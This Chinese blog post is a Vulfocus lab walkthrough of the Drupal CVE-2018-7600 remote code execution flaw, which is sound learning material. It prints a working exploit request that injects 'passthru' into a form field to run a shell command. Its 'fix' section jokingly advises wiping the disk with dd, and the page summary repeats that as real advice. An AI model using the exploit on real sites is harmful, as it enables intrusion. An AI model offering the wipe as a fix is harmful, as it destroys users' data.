[Vulfocus解题系列]Drupal 远程代码执行漏洞(CVE-2018-7600)

最新推荐文章于 2025-04-21 17:33:08 发布
原创 最新推荐文章于 2025-04-21 17:33:08 发布 · 1.7k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

这篇博客介绍了Drupal内容管理框架的一个高危远程代码执行漏洞(CVE-2018-7600)。攻击者可通过构造特定的POC代码,执行恶意代码,完全控制受影响的网站。修复建议包括彻底删除网站程序、数据库、PHP解释器及相关组件。

漏洞介绍

近日,流行的开源内容管理框架Drupal曝出一个远程代码执行漏洞,漏洞威胁等级为高危,攻击者可以利用该漏洞执行恶意代码,导致网站完全被控制。漏洞对应的CVE编号为CVE-2018-7600。

解题过程

1.打开靶场
在这里插入图片描述

2.直接构造poc代码

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: 靶机地址
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://靶机地址/user/register
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663
Content-Length: 626
Connection: close
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name=“mail[#post_render][]”
passthru
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name=“mail[#type]”
markup
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name=“mail[#markup]”
ls -l /tmp
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name=“form_id”
user_register_form
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="_drupal_ajax"

3.放到burp中利用,返回flag
在这里插入图片描述

漏洞原理

这个漏洞的根本原因出在drupal对表单的渲染上
具体查看:CVE-2018-7600 漏洞分析

修复建议

直接从网站根目录删除网站程序并且清空数据库 然后卸载php解释器以及web中间件 然后卸载mysql 以上操作结束后删除服务器根目录 然后覆盖删除硬盘上的所有数据

dd if = /dev/urandom of = /dev/硬盘名

Drupal远程代码执行漏洞(CVE-2018-7600)
渗透之路,攻防之间皆学问
03-31 5788
一. 漏洞原理 Drupal是一个开源内容管理系统(CMS),全球超过100万个网站(包括政府,电子零售,企业组织,金融机构等)使用。Drupal安全团队披露了一个非常关键的漏洞,编号CVE-2018-7600Drupal对表单请求内容未做严格过滤,因此,这使得攻击者可能将恶意注入表单内容,此漏洞允许未经身份验证的攻击者在默认或常见的Drupal安装上执行远程代码执行。 二. 影响版本 Drupal 6.x Drupal 7.x Drupal 8.x 三. 漏洞环境搭建 ...
[ vulhub漏洞复现篇 ] Drupal Drupalgeddon 2 远程代码执行漏洞CVE-2018-7600
qq_51577576的博客
02-18 982
[ vulhub漏洞复现篇 ] Drupal Drupalgeddon 2 远程代码执行漏洞CVE-2018-7600Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。连续多年荣获全球最佳CMS大奖,是基于PHP语言最著名的WEB应用程序。Drupal 6,7,8等多个子版本存在远程代码执行漏洞,攻击者可以利用Drupal网站漏洞,执行恶意代码,导致网站被完全控制。
DRUPAL 8.x远程代码执行漏洞(CVE-2018-7600)
errorr0
07-28 3656
drupal命令执行
CVE-2018-7600Drupal 8 远程代码执行漏洞
Mr_atopos的博客
06-07 3349
使用vulhub搭建环境使用vulhub搭建环境出现了一些问题,这里直接使用BUU的环境 BUU CEV-2018-7600进去也要初始化环境,一开始语言选择英文,数据库选择SQLite 其他的可以随便设置 进入 这个漏洞可能出现在填写表单的地方,该漏洞是Form API在用户提交表单数据时可以在表单渲染过程中修改表单数据想利用该漏洞,就需要在表单结构中的某个地方注入渲染数组,所以,首先要找到注入位置可以利用注册用户来进行漏洞利用先随便输入测试 通过查阅 Drupal 的代码和文档,可以知道,对于
vulfocus——drupal1代码执行(CVE-2018-7600)
m0_62063669的博客
09-07 1148
Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成。该漏洞的产生的根本原因在于Drupal对表单的渲染上,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻击的网站。函数会把第一个参数作为回调函数,之后的参数作为回调函数的参数。有特殊的处理,攻击者可利用Drupal表单渲染的问题执行恶意代码,达到完全控制。时就会提示可能导致代码执行Drupal的问题稍显常规,来自。是用户可控的,这就导致了。
Drupal远程代码执行漏洞CVE-2018-7600
ANOrange的博客
04-10 1418
DrupalDrupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。Drupal中带有默认或通用模块配置的多个子系统存在安全漏洞远程攻击者可利用该漏洞执行任意代码。通过对比官方的补丁,可以得知是请求中存在 # 开头的参数。Drupal Render API 对于 # 有特殊处理。
漏洞复现】Drupal 远程代码执行漏洞(CVE-2018-7600)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-12 1160
Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成该漏洞的产生的根本原因在于Drupal对表单的渲染上,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻击的网站。...
Drupal 远程代码执行漏洞CVE-2018-7602)
黑白的博客
12-28 3271
声明 好好学习,天天向上 漏洞描述 4月25日,Drupal官方发布通告,Drupal Core 存在一个远程代码执行漏洞,影响 7.x 和 8.x 版本。据分析,这个漏洞CVE-2018-7600的绕过利用,两个漏洞原理是一样的,通告还称,已经发现了这个漏洞CVE-2018-7600的在野利用 影响范围 Drupal 6.x,7.x,8.x 复现过程 这里使用7.57版本 使用vulhub /app/vulhub-master/drupal/CVE-2018-7602 使用docker启动 dock
CVE-2018-7600 Drupal核心远程代码执行漏洞分析
weixin_34246551的博客
12-27 402
0x01 漏洞介绍 Drupal是一个开源内容管理系统(CMS),全球超过100万个网站(包括政府,电子零售,企业组织,金融机构等)使用。两周前,Drupal安全团队披露了一个非常关键的漏洞,编号CVE-2018-7600 Drupal对表单请求内容未做严格过滤,因此,这使得攻击者可能将恶意注入表单内容,此漏洞允许未经身份验证的攻击者在默认或常见的Drupal安装上执行远程代码执行。...
CVE-2018-7600
05-14
CVE-2018-7600-master CVE-2018-7600-master CVE-2018-7600-master在我的文章有复现欢迎交流
Drupal Drupalgeddon 2 未授权远程代码执行漏洞CVE-2018-7600
最新发布
sucker的博客
04-21 1058
环境启动后,访问http://your-ip:8080/将会看到Drupal的安装页面。漏洞的触发点在 Drupal 的 AJAX 渲染机制中,攻击者可以通过设置 _drupal_ajax=1 参数,强制 Drupal 以 AJAX 模式执行表单渲染流程,此流程中会解析并渲染用户提交的数据。Drupal 渲染表单元素的核心流程中会检测是否存在 #post_render、#markup 等字段,如果存在,则会调用其中。Drupal 没有对这些 # 开头的特殊字段做适当的白名单校验,导致攻击者可以。
代码审计之CVE-2018-7600-Drupal远程代码执行漏洞-Render API
weixin_30341735的博客
03-15 571
  今天学习一下Drupal的另一个漏洞,由于渲染数组不当造成的漏洞   poc: url:http://localhost/drupal-8.5.0/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax post: 'mail[a][#...
CVE-2018-7600 Drupal 远程代码执行漏洞
星落的博客
04-07 974
漏洞介绍 Drupal 是一款用量庞大的CMS,在Form API中存在一处远程代码执行漏洞。 影响版本 Drupal 6.x Drupal 7.x Drupal 8.x 环境搭建 1.切换到drupal相关目录下,部署docker环境 cd/root/vulhub/weblogic/CVE-2018-7600 docker-compose build docker-compose up -d 2.查看docker服务器情况 dock ps -a 3.环境启动后,访问`htt..
Drupal-CVE-2018-7600漏洞(远程代码执行)
tiay__的博客
12-25 925
漏洞产生的原因在于Drupal对表单渲染时未进行严格的安全过滤,导致攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码。
DC-1靶场(CVE-2018-7600)
lionwerson的博客
10-14 2013
1.下载DC-1靶场: DC-1下载地址https://download.vulnhub.com/dc/DC-1.zip2.解压打开靶场,导入虚拟机网络模式改为桥接模式,打开虚拟机。 3.浏览器访问80端口,其实也可以先用nmap扫描一下端口。 是一个Drupal CMS。 4.先挂扫描器走一波。 发现存在CVE-2018-7600Drupal的一个RCE,并且小于7的版本都可以,这个应该就是这个靶场的主要漏洞了。 poc如下: 漏洞存在,验证 poc: #!/usr/b..
drupal 代码执行 (CVE-2018-7600)复现
YouthBelief的博客
11-04 4996
@[TOC](drupal 代码执行 (CVE-2018-7600)) drupal 代码执行 (CVE-2018-7600) Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成 0x01 漏洞描述 http://blog.nsfocus.net/cve-2018-7600-analysis/ 该漏洞的产生的根本原因在于Drupal对表单的渲染上,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻
vulhub:drupal 代码执行漏洞复现 (CVE-2018-7600)
sszsNo1的博客
07-02 659
vulhub:drupal 代码执行漏洞 (CVE-2018-7600)如何复现
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值